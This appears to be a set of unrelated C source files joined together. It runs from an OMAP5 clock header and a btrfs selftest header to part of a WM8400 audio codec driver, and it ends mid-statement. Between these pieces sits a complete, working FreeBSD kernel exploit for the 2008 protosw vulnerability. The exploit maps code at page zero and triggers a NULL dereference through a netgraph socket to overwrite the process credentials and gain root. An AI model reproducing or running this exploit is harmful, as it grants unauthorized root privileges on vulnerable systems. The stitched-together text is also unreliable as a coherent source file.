CM_ABE_PLL_REF_CLKSEL_CLKSEL_SHIFT 0 #define CM_ABE_PLL_REF_CLKSEL_CLKSEL_MASK 1 #define CM_ABE_PLL_REF_CLKSEL_CLKSEL_SYSCLK 0 #define CM_ABE_PLL_REF_CLKSEL_CLKSEL_32KCLK 1 /* CM_BYPCLK_DPLL_IVA */ #define CM_BYPCLK_DPLL_IVA_CLKSEL_SHIFT 0 #define CM_BYPCLK_DPLL_IVA_CLKSEL_MASK 3 #define DPLL_IVA_CLKSEL_CORE_X2_DIV_2 1 /* CM_SHADOW_FREQ_CONFIG1 */ #define SHADOW_FREQ_CONFIG1_FREQ_UPDATE_MASK 1 #define SHADOW_FREQ_CONFIG1_DLL_OVERRIDE_MASK 4 #define SHADOW_FREQ_CONFIG1_DLL_RESET_MASK 8 #define SHADOW_FREQ_CONFIG1_DPLL_EN_SHIFT 8 #define SHADOW_FREQ_CONFIG1_DPLL_EN_MASK (7 << 8) #define SHADOW_FREQ_CONFIG1_M2_DIV_SHIFT 11 #define SHADOW_FREQ_CONFIG1_M2_DIV_MASK (0x1F << 11) /*CM_<clock_domain>__CLKCTRL */ #define CD_CLKCTRL_CLKTRCTRL_SHIFT 0 #define CD_CLKCTRL_CLKTRCTRL_MASK 3 #define CD_CLKCTRL_CLKTRCTRL_NO_SLEEP 0 #define 
CD_CLKCTRL_CLKTRCTRL_SW_SLEEP 1 #define CD_CLKCTRL_CLKTRCTRL_SW_WKUP 2 #define CD_CLKCTRL_CLKTRCTRL_HW_AUTO 3 /* CM_<clock_domain>_<module>_CLKCTRL */ #define MODULE_CLKCTRL_MODULEMODE_SHIFT 0 #define MODULE_CLKCTRL_MODULEMODE_MASK 3 #define MODULE_CLKCTRL_IDLEST_SHIFT 16 #define MODULE_CLKCTRL_IDLEST_MASK (3 << 16) #define MODULE_CLKCTRL_MODULEMODE_SW_DISABLE 0 #define MODULE_CLKCTRL_MODULEMODE_HW_AUTO 1 #define MODULE_CLKCTRL_MODULEMODE_SW_EXPLICIT_EN 2 #define MODULE_CLKCTRL_IDLEST_FULLY_FUNCTIONAL 0 #define MODULE_CLKCTRL_IDLEST_TRANSITIONING 1 #define MODULE_CLKCTRL_IDLEST_IDLE 2 #define MODULE_CLKCTRL_IDLEST_DISABLED 3 /* CM_L4PER_GPIO4_CLKCTRL */ #define GPIO4_CLKCTRL_OPTFCLKEN_MASK (1 << 8) /* CM_L3INIT_HSMMCn_CLKCTRL */ #define HSMMC_CLKCTRL_CLKSEL_MASK (1 << 24) #define HSMMC_CLKCTRL_CLKSEL_DIV_MASK (1 << 25) /* CM_WKUP_GPTIMER1_CLKCTRL */ #define GPTIMER1_CLKCTRL_CLKSEL_MASK (1 << 24) /* CM_CAM_ISS_CLKCTRL */ #define ISS_CLKCTRL_OPTFCLKEN_MASK (1 << 8) /* CM_DSS_DSS_CLKCTRL */ #define DSS_CLKCTRL_OPTFCLKEN_MASK 0xF00 /* CM_L3INIT_USBPHY_CLKCTRL */ #define USBPHY_CLKCTRL_OPTFCLKEN_PHY_48M_MASK 8 /* CM_MPU_MPU_CLKCTRL */ #define MPU_CLKCTRL_CLKSEL_EMIF_DIV_MODE_SHIFT 24 #define MPU_CLKCTRL_CLKSEL_EMIF_DIV_MODE_MASK (1 << 24) #define MPU_CLKCTRL_CLKSEL_ABE_DIV_MODE_SHIFT 25 #define MPU_CLKCTRL_CLKSEL_ABE_DIV_MODE_MASK (1 << 25) /* CM_WKUPAON_SCRM_CLKCTRL */ #define OPTFCLKEN_SCRM_PER_SHIFT 9 #define OPTFCLKEN_SCRM_PER_MASK (1 << 9) #define OPTFCLKEN_SCRM_CORE_SHIFT 8 #define OPTFCLKEN_SCRM_CORE_MASK (1 << 8) /* Clock frequencies */ #define OMAP_SYS_CLK_FREQ_38_4_MHZ 38400000 #define OMAP_SYS_CLK_IND_38_4_MHZ 6 #define OMAP_32K_CLK_FREQ 32768 /* PRM_VC_VAL_BYPASS */ #define PRM_VC_I2C_CHANNEL_FREQ_KHZ 400 /* SMPS */ #define SMPS_I2C_SLAVE_ADDR 0x12 #define SMPS_REG_ADDR_12_MPU 0x23 #define SMPS_REG_ADDR_45_IVA 0x2B #define SMPS_REG_ADDR_8_CORE 0x37 /* PALMAS VOLTAGE SETTINGS in mv for OPP_NOMINAL */ #define VDD_MPU 1000 #define VDD_MM 1000 #define VDD_CORE 
1040 #define VDD_MPU_5432 1150 #define VDD_MM_5432 1150 #define VDD_CORE_5432 1150 /* Standard offset is 0.5v expressed in uv */ #define PALMAS_SMPS_BASE_VOLT_UV 500000 /* TPS */ #define TPS62361_I2C_SLAVE_ADDR 0x60 #define TPS62361_REG_ADDR_SET0 0x0 #define TPS62361_REG_ADDR_SET1 0x1 #define TPS62361_REG_ADDR_SET2 0x2 #define TPS62361_REG_ADDR_SET3 0x3 #define TPS62361_REG_ADDR_CTRL 0x4 #define TPS62361_REG_ADDR_TEMP 0x5 #define TPS62361_REG_ADDR_RMP_CTRL 0x6 #define TPS62361_REG_ADDR_CHIP_ID 0x8 #define TPS62361_REG_ADDR_CHIP_ID_2 0x9 #define TPS62361_BASE_VOLT_MV 500 #define TPS62361_VSEL0_GPIO 7 /* Defines for DPLL setup */ #define DPLL_LOCKED_FREQ_TOLERANCE_0 0 #define DPLL_LOCKED_FREQ_TOLERANCE_500_KHZ 500 #define DPLL_LOCKED_FREQ_TOLERANCE_1_MHZ 1000 #define DPLL_NO_LOCK 0 #define DPLL_LOCK 1 #define NUM_SYS_CLKS 7 struct dpll_regs { u32 cm_clkmode_dpll; u32 cm_idlest_dpll; u32 cm_autoidle_dpll; u32 cm_clksel_dpll; u32 cm_div_m2_dpll; u32 cm_div_m3_dpll; u32 cm_div_h11_dpll; u32 cm_div_h12_dpll; u32 cm_div_h13_dpll; u32 cm_div_h14_dpll; u32 reserved[3]; u32 cm_div_h22_dpll; u32 cm_div_h23_dpll; }; /* DPLL parameter table */ struct dpll_params { u32 m; u32 n; s8 m2; s8 m3; s8 h11; s8 h12; s8 h13; s8 h14; s8 h22; s8 h23; }; extern struct omap5_prcm_regs *const prcm; extern const u32 sys_clk_array[8]; void scale_vcores(void); void do_scale_tps62361(int gpio, u32 reg, u32 volt_mv); u32 get_offset_code(u32 offset); u32 omap_ddr_clk(void); void do_scale_vcore(u32 vcore_reg, u32 volt_mv); void setup_post_dividers(u32 *const base, const struct dpll_params *params); u32 get_sys_clk_index(void); void enable_basic_clocks(void); void enable_non_essential_clocks(void); void enable_basic_uboot_clocks(void); void do_enable_clocks(u32 *const *clk_domains, u32 *const *clk_modules_hw_auto, u32 *const *clk_modules_explicit_en, u8 wait_for_enable); const struct dpll_params *get_mpu_dpll_params(void); const struct dpll_params *get_core_dpll_params(void); const struct dpll_params 
*get_per_dpll_params(void); const struct dpll_params *get_iva_dpll_params(void); const struct dpll_params *get_usb_dpll_params(void); const struct dpll_params *get_abe_dpll_params(void); #endif /* _CLOCKS_OMAP5_H_ */
{ "language": "C" }
/* * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability * defined here: * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc * * This will overwrite your credential structure in the kernel. This will * affect more than just the exploit's process, which is why this doesn't * spawn a shell. When the exploit has finished, your login shell should * have euid=0. * * Enjoy, and happy holidays! * - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008 */ #include <sys/mman.h> #include <sys/time.h> #include <sys/stat.h> #include <sys/proc.h> #include <sys/types.h> #include <sys/param.h> #include <sys/socket.h> #include <netgraph/ng_socket.h> #include <unistd.h> #include <stdlib.h> #include <stdio.h> #include <errno.h> #define PAGES 1 #define PATTERN1 0x8f8f8f8f #define PATTERN2 0x6e6e6e6e typedef unsigned long ulong; typedef unsigned char uchar; int x(void) { struct proc * p = (struct proc * )PATTERN1; uint * i; while(1) { if(p->p_pid == PATTERN2) { i = (uint * )p->p_ucred; *++i = 0; break; } p = p->p_list.le_next; } return 1; } int main(int argc, char * argv[]) { ulong addr; uchar * c; uchar * d; uint * i; void * v; int pid; int s; if(argc != 2) { fprintf(stderr, "usage: ./x <allproc>\n"); return 1; } addr = strtoul(argv[1], 0, 0); v = mmap( NULL, (PAGES*PAGE_SIZE), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_FIXED, -1, 0); if(v == MAP_FAILED) { perror("mmap"); return 0; } c = v; d = (uchar * )x; while(1) { *c = *d; if(*d == 0xc3) { break; } d++; c++; } *c++ = 0xc3; c = v; while(1) { if(*(long * )c == PATTERN1) { *(c + 0) = addr >> 0; *(c + 1) = addr >> 8; *(c + 2) = addr >> 16; *(c + 3) = addr >> 24; break; } c++; } pid = getpid(); while(1) { if(*(long * )c == PATTERN2) { *(c + 0) = pid >> 0; *(c + 1) = pid >> 8; *(c + 2) = pid >> 16; *(c + 3) = pid >> 24; break; } c++; } s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); if(s < 0) { perror("socket"); return 1; } shutdown(s, SHUT_RDWR); return 0; } // milw0rm.com [2008-12-28]
{ "language": "C" }
/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright (C) 2013 Fusion IO. All rights reserved.
 */

#ifndef BTRFS_TESTS_H
#define BTRFS_TESTS_H

#ifdef CONFIG_BTRFS_FS_RUN_SANITY_TESTS

/* Entry point that runs all of the btrfs self-test suites below. */
int btrfs_run_sanity_tests(void);

/* Logging helpers for the self-tests; test_err also records file:line. */
#define test_msg(fmt, ...) pr_info("BTRFS: selftest: " fmt "\n", ##__VA_ARGS__)
#define test_err(fmt, ...) pr_err("BTRFS: selftest: %s:%d " fmt "\n",	\
		__FILE__, __LINE__, ##__VA_ARGS__)

/* Report one of the canned messages from test_error[] by index. */
#define test_std_err(index) test_err("%s", test_error[index])

/*
 * Indices into test_error[] -- one per kind of dummy-object allocation
 * the tests perform (used with test_std_err on failure).
 */
enum {
	TEST_ALLOC_FS_INFO,
	TEST_ALLOC_ROOT,
	TEST_ALLOC_EXTENT_BUFFER,
	TEST_ALLOC_PATH,
	TEST_ALLOC_INODE,
	TEST_ALLOC_BLOCK_GROUP,
	TEST_ALLOC_EXTENT_MAP,
};

/* Message table indexed by the enum above; defined in the tests code. */
extern const char *test_error[];

struct btrfs_root;
struct btrfs_trans_handle;

/* Individual test suites, parameterised by sector and node size. */
int btrfs_test_extent_buffer_operations(u32 sectorsize, u32 nodesize);
int btrfs_test_free_space_cache(u32 sectorsize, u32 nodesize);
int btrfs_test_extent_io(u32 sectorsize, u32 nodesize);
int btrfs_test_inodes(u32 sectorsize, u32 nodesize);
int btrfs_test_qgroups(u32 sectorsize, u32 nodesize);
int btrfs_test_free_space_tree(u32 sectorsize, u32 nodesize);
int btrfs_test_extent_map(void);

/*
 * Constructors/destructors for dummy objects the tests operate on,
 * detached from any real mounted filesystem.  Each btrfs_alloc_dummy_*
 * result is released with the matching btrfs_free_dummy_* below.
 */
struct inode *btrfs_new_test_inode(void);
struct btrfs_fs_info *btrfs_alloc_dummy_fs_info(u32 nodesize, u32 sectorsize);
void btrfs_free_dummy_fs_info(struct btrfs_fs_info *fs_info);
void btrfs_free_dummy_root(struct btrfs_root *root);
struct btrfs_block_group *
btrfs_alloc_dummy_block_group(struct btrfs_fs_info *fs_info,
			      unsigned long length);
void btrfs_free_dummy_block_group(struct btrfs_block_group *cache);
void btrfs_init_dummy_trans(struct btrfs_trans_handle *trans,
			    struct btrfs_fs_info *fs_info);
struct btrfs_device *btrfs_alloc_dummy_device(struct btrfs_fs_info *fs_info);
#else
/* Tests compiled out: report success without doing anything. */
static inline int btrfs_run_sanity_tests(void)
{
	return 0;
}
#endif

#endif
{ "language": "C" }
/* * wm8400.c -- WM8400 ALSA Soc Audio driver * * Copyright 2008-11 Wolfson Microelectronics PLC. * Author: Mark Brown <broonie@opensource.wolfsonmicro.com> * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the * Free Software Foundation; either version 2 of the License, or (at your * option) any later version. * */ #include <linux/module.h> #include <linux/moduleparam.h> #include <linux/kernel.h> #include <linux/slab.h> #include <linux/init.h> #include <linux/delay.h> #include <linux/pm.h> #include <linux/platform_device.h> #include <linux/regulator/consumer.h> #include <linux/mfd/wm8400-audio.h> #include <linux/mfd/wm8400-private.h> #include <linux/mfd/core.h> #include <sound/core.h> #include <sound/pcm.h> #include <sound/pcm_params.h> #include <sound/soc.h> #include <sound/initval.h> #include <sound/tlv.h> #include "wm8400.h" static struct regulator_bulk_data power[] = { { .supply = "I2S1VDD", }, { .supply = "I2S2VDD", }, { .supply = "DCVDD", }, { .supply = "AVDD", }, { .supply = "FLLVDD", }, { .supply = "HPVDD", }, { .supply = "SPKVDD", }, }; /* codec private data */ struct wm8400_priv { struct snd_soc_codec *codec; struct wm8400 *wm8400; u16 fake_register; unsigned int sysclk; unsigned int pcmclk; struct work_struct work; int fll_in, fll_out; }; static void wm8400_codec_reset(struct snd_soc_codec *codec) { struct wm8400_priv *wm8400 = snd_soc_codec_get_drvdata(codec); wm8400_reset_codec_reg_cache(wm8400->wm8400); } static const DECLARE_TLV_DB_SCALE(rec_mix_tlv, -1500, 600, 0); static const DECLARE_TLV_DB_SCALE(in_pga_tlv, -1650, 3000, 0); static const DECLARE_TLV_DB_SCALE(out_mix_tlv, -2100, 0, 0); static const DECLARE_TLV_DB_SCALE(out_pga_tlv, -7300, 600, 0); static const DECLARE_TLV_DB_SCALE(out_omix_tlv, -600, 0, 0); static const DECLARE_TLV_DB_SCALE(out_dac_tlv, -7163, 0, 0); static const DECLARE_TLV_DB_SCALE(in_adc_tlv, -7163, 1763, 0); static const 
DECLARE_TLV_DB_SCALE(out_sidetone_tlv, -3600, 0, 0); static int wm8400_outpga_put_volsw_vu(struct snd_kcontrol *kcontrol, struct snd_ctl_elem_value *ucontrol) { struct snd_soc_codec *codec = snd_soc_kcontrol_codec(kcontrol); struct soc_mixer_control *mc = (struct soc_mixer_control *)kcontrol->private_value; int reg = mc->reg; int ret; u16 val; ret = snd_soc_put_volsw(kcontrol, ucontrol); if (ret < 0) return ret; /* now hit the volume update bits (always bit 8) */ val = snd_soc_read(codec, reg); return snd_soc_write(codec, reg, val | 0x0100); } #define WM8400_OUTPGA_SINGLE_R_TLV(xname, reg, shift, max, invert, tlv_array) \ SOC_SINGLE_EXT_TLV(xname, reg, shift, max, invert, \ snd_soc_get_volsw, wm8400_outpga_put_volsw_vu, tlv_array) static const char *wm8400_digital_sidetone[] = {"None", "Left ADC", "Right ADC", "Reserved"}; static SOC_ENUM_SINGLE_DECL(wm8400_left_digital_sidetone_enum, WM8400_DIGITAL_SIDE_TONE, WM8400_ADC_TO_DACL_SHIFT, wm8400_digital_sidetone); static SOC_ENUM_SINGLE_DECL(wm8400_right_digital_sidetone_enum, WM8400_DIGITAL_SIDE_TONE, WM8400_ADC_TO_DACR_SHIFT, wm8400_digital_sidetone); static const char *wm8400_adcmode[] = {"Hi-fi mode", "Voice mode 1", "Voice mode 2", "Voice mode 3"}; static SOC_ENUM_SINGLE_DECL(wm8400_right_adcmode_enum, WM8400_ADC_CTRL, WM8400_ADC_HPF_CUT_SHIFT, wm8400_adcmode); static const struct snd_kcontrol_new wm8400_snd_controls[] = { /* INMIXL */ SOC_SINGLE("LIN12 PGA Boost", WM8400_INPUT_MIXER3, WM8400_L12MNBST_SHIFT, 1, 0), SOC_SINGLE("LIN34 PGA Boost", WM8400_INPUT_MIXER3, WM8400_L34MNBST_SHIFT, 1, 0), /* INMIXR */ SOC_SINGLE("RIN12 PGA Boost", WM8400_INPUT_MIXER3, WM8400_R12MNBST_SHIFT, 1, 0), SOC_SINGLE("RIN34 PGA Boost", WM8400_INPUT_MIXER3, WM8400_R34MNBST_SHIFT, 1, 0), /* LOMIX */ SOC_SINGLE_TLV("LOMIX LIN3 Bypass Volume", WM8400_OUTPUT_MIXER3, WM8400_LLI3LOVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("LOMIX RIN12 PGA Bypass Volume", WM8400_OUTPUT_MIXER3, WM8400_LR12LOVOL_SHIFT, 7, 0, out_mix_tlv), 
SOC_SINGLE_TLV("LOMIX LIN12 PGA Bypass Volume", WM8400_OUTPUT_MIXER3, WM8400_LL12LOVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("LOMIX RIN3 Bypass Volume", WM8400_OUTPUT_MIXER5, WM8400_LRI3LOVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("LOMIX AINRMUX Bypass Volume", WM8400_OUTPUT_MIXER5, WM8400_LRBLOVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("LOMIX AINLMUX Bypass Volume", WM8400_OUTPUT_MIXER5, WM8400_LRBLOVOL_SHIFT, 7, 0, out_mix_tlv), /* ROMIX */ SOC_SINGLE_TLV("ROMIX RIN3 Bypass Volume", WM8400_OUTPUT_MIXER4, WM8400_RRI3ROVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("ROMIX LIN12 PGA Bypass Volume", WM8400_OUTPUT_MIXER4, WM8400_RL12ROVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("ROMIX RIN12 PGA Bypass Volume", WM8400_OUTPUT_MIXER4, WM8400_RR12ROVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("ROMIX LIN3 Bypass Volume", WM8400_OUTPUT_MIXER6, WM8400_RLI3ROVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("ROMIX AINLMUX Bypass Volume", WM8400_OUTPUT_MIXER6, WM8400_RLBROVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("ROMIX AINRMUX Bypass Volume", WM8400_OUTPUT_MIXER6, WM8400_RRBROVOL_SHIFT, 7, 0, out_mix_tlv), /* LOUT */ WM8400_OUTPGA_SINGLE_R_TLV("LOUT Volume", WM8400_LEFT_OUTPUT_VOLUME, WM8400_LOUTVOL_SHIFT, WM8400_LOUTVOL_MASK, 0, out_pga_tlv), SOC_SINGLE("LOUT ZC", WM8400_LEFT_OUTPUT_VOLUME, WM8400_LOZC_SHIFT, 1, 0), /* ROUT */ WM8400_OUTPGA_SINGLE_R_TLV("ROUT Volume", WM8400_RIGHT_OUTPUT_VOLUME, WM8400_ROUTVOL_SHIFT, WM8400_ROUTVOL_MASK, 0, out_pga_tlv), SOC_SINGLE("ROUT ZC", WM8400_RIGHT_OUTPUT_VOLUME, WM8400_ROZC_SHIFT, 1, 0), /* LOPGA */ WM8400_OUTPGA_SINGLE_R_TLV("LOPGA Volume", WM8400_LEFT_OPGA_VOLUME, WM8400_LOPGAVOL_SHIFT, WM8400_LOPGAVOL_MASK, 0, out_pga_tlv), SOC_SINGLE("LOPGA ZC Switch", WM8400_LEFT_OPGA_VOLUME, WM8400_LOPGAZC_SHIFT, 1, 0), /* ROPGA */ WM8400_OUTPGA_SINGLE_R_TLV("ROPGA Volume", WM8400_RIGHT_OPGA_VOLUME, WM8400_ROPGAVOL_SHIFT, WM8400_ROPGAVOL_MASK, 0, out_pga_tlv), SOC_SINGLE("ROPGA ZC Switch", WM8400_RIGHT_OPGA_VOLUME, 
WM8400_ROPGAZC_SHIFT, 1, 0), SOC_SINGLE("LON Mute Switch", WM8400_LINE_OUTPUTS_VOLUME, WM8400_LONMUTE_SHIFT, 1, 0), SOC_SINGLE("LOP Mute Switch", WM8400_LINE_OUTPUTS_VOLUME, WM8400_LOPMUTE_SHIFT, 1, 0), SOC_SINGLE("LOP Attenuation Switch", WM8400_LINE_OUTPUTS_VOLUME, WM8400_LOATTN_SHIFT, 1, 0), SOC_SINGLE("RON Mute Switch", WM8400_LINE_OUTPUTS_VOLUME, WM8400_RONMUTE_SHIFT, 1, 0), SOC_SINGLE("ROP Mute Switch", WM8400_LINE_OUTPUTS_VOLUME, WM8400_ROPMUTE_SHIFT, 1, 0), SOC_SINGLE("ROP Attenuation Switch", WM8400_LINE_OUTPUTS_VOLUME, WM8400_ROATTN_SHIFT, 1, 0), SOC_SINGLE("OUT3 Mute Switch", WM8400_OUT3_4_VOLUME, WM8400_OUT3MUTE_SHIFT, 1, 0), SOC_SINGLE("OUT3 Attenuation Switch", WM8400_OUT3_4_VOLUME, WM8400_OUT3ATTN_SHIFT, 1, 0), SOC_SINGLE("OUT4 Mute Switch", WM8400_OUT3_4_VOLUME, WM8400_OUT4MUTE_SHIFT, 1, 0), SOC_SINGLE("OUT4 Attenuation Switch", WM8400_OUT3_4_VOLUME, WM8400_OUT4ATTN_SHIFT, 1, 0), SOC_SINGLE("Speaker Mode Switch", WM8400_CLASSD1, WM8400_CDMODE_SHIFT, 1, 0), SOC_SINGLE("Speaker Output Attenuation Volume", WM8400_SPEAKER_VOLUME, WM8400_SPKATTN_SHIFT, WM8400_SPKATTN_MASK, 0), SOC_SINGLE("Speaker DC Boost Volume", WM8400_CLASSD3, WM8400_DCGAIN_SHIFT, 6, 0), SOC_SINGLE("Speaker AC Boost Volume", WM8400_CLASSD3, WM8400_ACGAIN_SHIFT, 6, 0), WM8400_OUTPGA_SINGLE_R_TLV("Left DAC Digital Volume", WM8400_LEFT_DAC_DIGITAL_VOLUME, WM8400_DACL_VOL_SHIFT, 127, 0, out_dac_tlv), WM8400_OUTPGA_SINGLE_R_TLV("Right DAC Digital Volume", WM8400_RIGHT_DAC_DIGITAL_VOLUME, WM8400_DACR_VOL_SHIFT, 127, 0, out_dac_tlv), SOC_ENUM("Left Digital Sidetone", wm8400_left_digital_sidetone_enum), SOC_ENUM("Right Digital Sidetone", wm8400_right_digital_sidetone_enum), SOC_SINGLE_TLV("Left Digital Sidetone Volume", WM8400_DIGITAL_SIDE_TONE, WM8400_ADCL_DAC_SVOL_SHIFT, 15, 0, out_sidetone_tlv), SOC_SINGLE_TLV("Right Digital Sidetone Volume", WM8400_DIGITAL_SIDE_TONE, WM8400_ADCR_DAC_SVOL_SHIFT, 15, 0, out_sidetone_tlv), SOC_SINGLE("ADC Digital High Pass Filter Switch", WM8400_ADC_CTRL, 
WM8400_ADC_HPF_ENA_SHIFT, 1, 0), SOC_ENUM("ADC HPF Mode", wm8400_right_adcmode_enum), WM8400_OUTPGA_SINGLE_R_TLV("Left ADC Digital Volume", WM8400_LEFT_ADC_DIGITAL_VOLUME, WM8400_ADCL_VOL_SHIFT, WM8400_ADCL_VOL_MASK, 0, in_adc_tlv), WM8400_OUTPGA_SINGLE_R_TLV("Right ADC Digital Volume", WM8400_RIGHT_ADC_DIGITAL_VOLUME, WM8400_ADCR_VOL_SHIFT, WM8400_ADCR_VOL_MASK, 0, in_adc_tlv), WM8400_OUTPGA_SINGLE_R_TLV("LIN12 Volume", WM8400_LEFT_LINE_INPUT_1_2_VOLUME, WM8400_LIN12VOL_SHIFT, WM8400_LIN12VOL_MASK, 0, in_pga_tlv), SOC_SINGLE("LIN12 ZC Switch", WM8400_LEFT_LINE_INPUT_1_2_VOLUME, WM8400_LI12ZC_SHIFT, 1, 0), SOC_SINGLE("LIN12 Mute Switch", WM8400_LEFT_LINE_INPUT_1_2_VOLUME, WM8400_LI12MUTE_SHIFT, 1, 0), WM8400_OUTPGA_SINGLE_R_TLV("LIN34 Volume", WM8400_LEFT_LINE_INPUT_3_4_VOLUME, WM8400_LIN34VOL_SHIFT, WM8400_LIN34VOL_MASK, 0, in_pga_tlv), SOC_SINGLE("LIN34 ZC Switch", WM8400_LEFT_LINE_INPUT_3_4_VOLUME, WM8400_LI34ZC_SHIFT, 1, 0), SOC_SINGLE("LIN34 Mute Switch", WM8400_LEFT_LINE_INPUT_3_4_VOLUME, WM8400_LI34MUTE_SHIFT, 1, 0), WM8400_OUTPGA_SINGLE_R_TLV("RIN12 Volume", WM8400_RIGHT_LINE_INPUT_1_2_VOLUME, WM8400_RIN12VOL_SHIFT, WM8400_RIN12VOL_MASK, 0, in_pga_tlv), SOC_SINGLE("RIN12 ZC Switch", WM8400_RIGHT_LINE_INPUT_1_2_VOLUME, WM8400_RI12ZC_SHIFT, 1, 0), SOC_SINGLE("RIN12 Mute Switch", WM8400_RIGHT_LINE_INPUT_1_2_VOLUME, WM8400_RI12MUTE_SHIFT, 1, 0), WM8400_OUTPGA_SINGLE_R_TLV("RIN34 Volume", WM8400_RIGHT_LINE_INPUT_3_4_VOLUME, WM8400_RIN34VOL_SHIFT, WM8400_RIN34VOL_MASK, 0, in_pga_tlv), SOC_SINGLE("RIN34 ZC Switch", WM8400_RIGHT_LINE_INPUT_3_4_VOLUME, WM8400_RI34ZC_SHIFT, 1, 0), SOC_SINGLE("RIN34 Mute Switch", WM8400_RIGHT_LINE_INPUT_3_4_VOLUME, WM8400_RI34MUTE_SHIFT, 1, 0), }; /* * _DAPM_ Controls */ static int outmixer_event (struct snd_soc_dapm_widget *w, struct snd_kcontrol * kcontrol, int event) { struct soc_mixer_control *mc = (struct soc_mixer_control *)kcontrol->private_value; u32 reg_shift = mc->shift; int ret = 0; u16 reg; switch (reg_shift) { case 
WM8400_SPEAKER_MIXER | (WM8400_LDSPK << 8) : reg = snd_soc_read(w->codec, WM8400_OUTPUT_MIXER1); if (reg & WM8400_LDLO) { printk(KERN_WARNING "Cannot set as Output Mixer 1 LDLO Set\n"); ret = -1; } break; case WM8400_SPEAKER_MIXER | (WM8400_RDSPK << 8): reg = snd_soc_read(w->codec, WM8400_OUTPUT_MIXER2); if (reg & WM8400_RDRO) { printk(KERN_WARNING "Cannot set as Output Mixer 2 RDRO Set\n"); ret = -1; } break; case WM8400_OUTPUT_MIXER1 | (WM8400_LDLO << 8): reg = snd_soc_read(w->codec, WM8400_SPEAKER_MIXER); if (reg & WM8400_LDSPK) { printk(KERN_WARNING "Cannot set as Speaker Mixer LDSPK Set\n"); ret = -1; } break; case WM8400_OUTPUT_MIXER2 | (WM8400_RDRO << 8): reg = snd_soc_read(w->codec, WM8400_SPEAKER_MIXER); if (reg & WM8400_RDSPK) { printk(KERN_WARNING "Cannot set as Speaker Mixer RDSPK Set\n"); ret = -1; } break; } return ret; } /* INMIX dB values */ static const unsigned int in_mix_tlv[] = { TLV_DB_RANGE_HEAD(1), 0,7, TLV_DB_SCALE_ITEM(-1200, 600, 0), }; /* Left In PGA Connections */ static const struct snd_kcontrol_new wm8400_dapm_lin12_pga_controls[] = { SOC_DAPM_SINGLE("LIN1 Switch", WM8400_INPUT_MIXER2, WM8400_LMN1_SHIFT, 1, 0), SOC_DAPM_SINGLE("LIN2 Switch", WM8400_INPUT_MIXER2, WM8400_LMP2_SHIFT, 1, 0), }; static const struct snd_kcontrol_new wm8400_dapm_lin34_pga_controls[] = { SOC_DAPM_SINGLE("LIN3 Switch", WM8400_INPUT_MIXER2, WM8400_LMN3_SHIFT, 1, 0), SOC_DAPM_SINGLE("LIN4 Switch", WM8400_INPUT_MIXER2, WM8400_LMP4_SHIFT, 1, 0), }; /* Right In PGA Connections */ static const struct snd_kcontrol_new wm8400_dapm_rin12_pga_controls[] = { SOC_DAPM_SINGLE("RIN1 Switch", WM8400_INPUT_MIXER2, WM8400_RMN1_SHIFT, 1, 0), SOC_DAPM_SINGLE("RIN2 Switch", WM8400_INPUT_MIXER2, WM8400_RMP2_SHIFT, 1, 0), }; static const struct snd_kcontrol_new wm8400_dapm_rin34_pga_controls[] = { SOC_DAPM_SINGLE("RIN3 Switch", WM8400_INPUT_MIXER2, WM8400_RMN3_SHIFT, 1, 0), SOC_DAPM_SINGLE("RIN4 Switch", WM8400_INPUT_MIXER2, WM8400_RMP4_SHIFT, 1, 0), }; /* INMIXL */ static const 
struct snd_kcontrol_new wm8400_dapm_inmixl_controls[] = { SOC_DAPM_SINGLE_TLV("Record Left Volume", WM8400_INPUT_MIXER3, WM8400_LDBVOL_SHIFT, WM8400_LDBVOL_MASK, 0, in_mix_tlv), SOC_DAPM_SINGLE_TLV("LIN2 Volume", WM8400_INPUT_MIXER5, WM8400_LI2BVOL_SHIFT, 7, 0, in_mix_tlv), SOC_DAPM_SINGLE("LINPGA12 Switch", WM8400_INPUT_MIXER3, WM8400_L12MNB_SHIFT, 1, 0), SOC_DAPM_SINGLE("LINPGA34 Switch", WM8400_INPUT_MIXER3, WM8400_L34MNB_SHIFT, 1, 0), }; /* INMIXR */ static const struct snd_kcontrol_new wm8400_dapm_inmixr_controls[] = { SOC_DAPM_SINGLE_TLV("Record Right Volume", WM8400_INPUT_MIXER4, WM8400_RDBVOL_SHIFT, WM8400_RDBVOL_MASK, 0, in_mix_tlv), SOC_DAPM_SINGLE_TLV("RIN2 Volume", WM8400_INPUT_MIXER6, WM8400_RI2BVOL_SHIFT, 7, 0, in_mix_tlv), SOC_DAPM_SINGLE("RINPGA12 Switch", WM8400_INPUT_MIXER3, WM8400_L12MNB_SHIFT, 1, 0), SOC_DAPM_SINGLE("RINPGA34 Switch", WM8400_INPUT_MIXER3, WM8400_L34MNB_SHIFT, 1, 0), }; /* AINLMUX */ static const char *wm8400_ainlmux[] = {"INMIXL Mix", "RXVOICE Mix", "DIFFINL Mix"}; static SOC_ENUM_SINGLE_DECL(wm8400_ainlmux_enum, WM8400_INPUT_MIXER1, WM8400_AINLMODE_SHIFT, wm8400_ainlmux); static const struct snd_kcontrol_new wm8400_dapm_ainlmux_controls = SOC_DAPM_ENUM("Route", wm8400_ainlmux_enum); /* DIFFINL */ /* AINRMUX */ static const char *wm8400_ainrmux[] = {"INMIXR Mix", "RXVOICE Mix", "DIFFINR Mix"}; static SOC_ENUM_SINGLE_DECL(wm8400_ainrmux_enum, WM8400_INPUT_MIXER1, WM8400_AINRMODE_SHIFT, wm8400_ainrmux); static const struct snd_kcontrol_new wm8400_dapm_ainrmux_controls = SOC_DAPM_ENUM("Route", 